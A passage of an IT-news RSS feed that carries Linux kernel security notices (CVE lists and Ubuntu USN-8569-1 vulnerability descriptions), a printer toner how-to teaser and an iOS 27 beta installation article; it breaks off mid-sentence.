  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43362, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43371, CVE-2026-43372,
CVE-2026-43373, CVE-2026-43377, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43386, CVE-2026-43387, CVE-2026-43395,
CVE-2026-43397, CVE-2026-43405, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43499, CVE-2026-43502,
CVE-2026-45834, CVE-2026-45835, CVE-2026-45836, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-45855, CVE-2026-45858, CVE-2026-45899, CVE-2026-45911,
CVE-2026-45920, CVE-2026-45924, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45956, CVE-2026-45958, CVE-2026-45985, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45989, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45996, CVE-2026-45997, CVE-2026-45999, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46009, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46031, CVE-2026-46033,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46116, CVE-2026-46117, CVE-2026-46120,
CVE-2026-46121, CVE-2026-46122, CVE-2026-46123, CVE-2026-46124,
CVE-2026-46125, CVE-2026-46126, CVE-2026-46127, CVE-2026-46128,
CVE-2026-46129, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46136, CVE-2026-46137, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46157, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46164, CVE-2026-46167,
CVE-2026-46168, CVE-2026-46169, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46184, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46273, CVE-2026-46274, CVE-2026-46280,
CVE-2026-46282, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46291, CVE-2026-46292, CVE-2026-46293, CVE-2026-46294,
CVE-2026-46296, CVE-2026-46299, CVE-2026-46301, CVE-2026-46303,
CVE-2026-46304, CVE-2026-46306, CVE-2026-46307, CVE-2026-46312,
CVE-2026-46314, CVE-2026-46319, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Change the Toner Cartridge in HP LaserJet Pro MFP M126nw]]></title>
<description><![CDATA[Key TakeawaysTo change the toner cartridge in an HP LaserJet Pro MFP M126nw, first lift the scanner assembly, open the top cover, remove the old cartridge, and carefully replace it with a new cartridge by aligning it with the printer's guides. Ensure all protective packaging is removed before ins...]]></description>
<link>https://tsecurity.de/de/3682649/it-security-nachrichten/how-to-change-the-toner-cartridge-in-hp-laserjet-pro-mfp-m126nw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682649/it-security-nachrichten/how-to-change-the-toner-cartridge-in-hp-laserjet-pro-mfp-m126nw/</guid>
<pubDate>Tue, 21 Jul 2026 06:54:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key TakeawaysTo change the toner cartridge in an HP LaserJet Pro MFP M126nw, first lift the scanner assembly, open the top cover, remove the old cartridge, and carefully replace it with a new cartridge by aligning it with the printer's guides. Ensure all protective packaging is removed before installation.Always check the exact cartridge number before […]</p>
<p>The post <a href="https://itechhacks.com/how-to-change-toner-cartridge-hp-m126nw/" data-wpel-link="internal">How to Change the Toner Cartridge in HP LaserJet Pro MFP M126nw</a> appeared first on <a href="https://itechhacks.com/" data-wpel-link="internal">iTech Hacks</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases iOS 27 Beta 4: What’s New and How to Install]]></title>
<description><![CDATA[Apple has released iOS 27 developer beta 4 for compatible iPhones, continuing its testing ahead of the public launch later this year. The update carries build number 24A5390f and replaces beta 3, which arrived earlier this month.



The latest beta is currently available to registered developers....]]></description>
<link>https://tsecurity.de/de/3682234/ios-mac-os/apple-releases-ios-27-beta-4-whats-new-and-how-to-install/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682234/ios-mac-os/apple-releases-ios-27-beta-4-whats-new-and-how-to-install/</guid>
<pubDate>Mon, 20 Jul 2026 23:47:15 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iOS 27 developer beta 4 for compatible iPhones, continuing its testing ahead of the public launch later this year. The update carries build number 24A5390f and replaces beta 3, which arrived earlier this month.



The latest beta is currently available to registered developers. Apple will likely release a matching public beta update after completing additional testing.



How to Update to iOS 27 Beta 4



Before installing the update, back up your iPhone to iCloud or a computer. Beta software can contain bugs that affect battery life, apps, connectivity, and everyday performance.




Open the Settings app on your iPhone.



Go to General.



Tap Software Update.



Select Beta Updates.



Choose iOS 27 Developer Beta.



Return to the previous screen.



Tap Update Now when iOS 27 Beta 4 appears.



Enter your passcode and wait for the installation to finish.




Keep your iPhone connected to Wi-Fi and ensure it has enough battery power before starting the update.



What’s New in iOS 27 Beta 4?



Apple has not announced any major user-facing features for iOS 27 Beta 4 so far. The update appears to focus mainly on fixing bugs, improving stability, and preparing existing iOS 27 features for wider testing.



Early users should look for changes in the following areas:




Performance improvements: Beta 4 should improve general system responsiveness and reduce some of the slowdowns reported in previous builds.



Bug fixes: Apple continues to address crashes, interface problems, broken animations, and other issues found during developer and public testing.



Battery and thermal performance: The update may improve excessive battery drain and device heating, although results can differ between iPhone models.



App compatibility: Developers can use the new build to test their apps against the latest iOS 27 software and API changes.



Siri AI and Apple Intelligence: Apple may continue making server-side and system-level improvements to the new AI features, even when visible changes are limited.




More changes may appear after users spend additional time testing the update. Since this remains an early beta, some features may still fail to work correctly.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8569-1: Linux kernel (HWE) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3681610/unix-server/usn-8569-1-linux-kernel-hwe-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681610/unix-server/usn-8569-1-linux-kernel-hwe-vulnerabilities/</guid>
<pubDate>Mon, 20 Jul 2026 18:18:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker could use this to escalate privileges, or possibly escape a
container. (CVE-2026-43284, CVE-2026-43500, CVE-2026-45998, CVE-2026-46000)

It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503,
CVE-2026-46300)

Qualys discovered that a race condition existed in the ptrace subsystem of
the Linux kernel when privileged processes are exiting. An unprivileged
local attacker could use this issue to expose sensitive information.
(CVE-2026-46333)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contain a memory leak when handling AppArmor notifications. A local
attacker could use this to cause resource exhaustion. (CVE-2026-47326)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contain a NULL pointer dereference when handling AppArmor notifications. A
local attacker could use this to cause a kernel oops. (CVE-2026-47327)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained an invalid free when handling AppArmor notifications. A local
attacker could use this to corrupt kernel memory. (CVE-2026-47328)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained insufficient validation of AppArmor notification responses. A
local attacker could use this to allow crafted responses to be processed.
(CVE-2026-47329)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0 used
an uninitialized variable when handling AppArmor notifications. A local
attacker could use this to cause incorrect caching of data.
(CVE-2026-47330)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained an out-of-bounds (OOB) read when handling AppArmor notifications.
A local attacker could use this to cause information disclosure of kernel
memory. (CVE-2026-47332)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained a out-of-bounds (OOB) read when handling AppArmor notifications.
A local attacker could use this to cause kernel memory corruption and,
theoretically, influence processing of AppArmor policies. (CVE-2026-47333)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained incorrect holding of locks when handling AppArmor notifications.
A local attacker could use this to cause a kernel panic or deadlock.
(CVE-2026-47334)

Tristan Madani and Trevor Lawrence have each independently discovered that
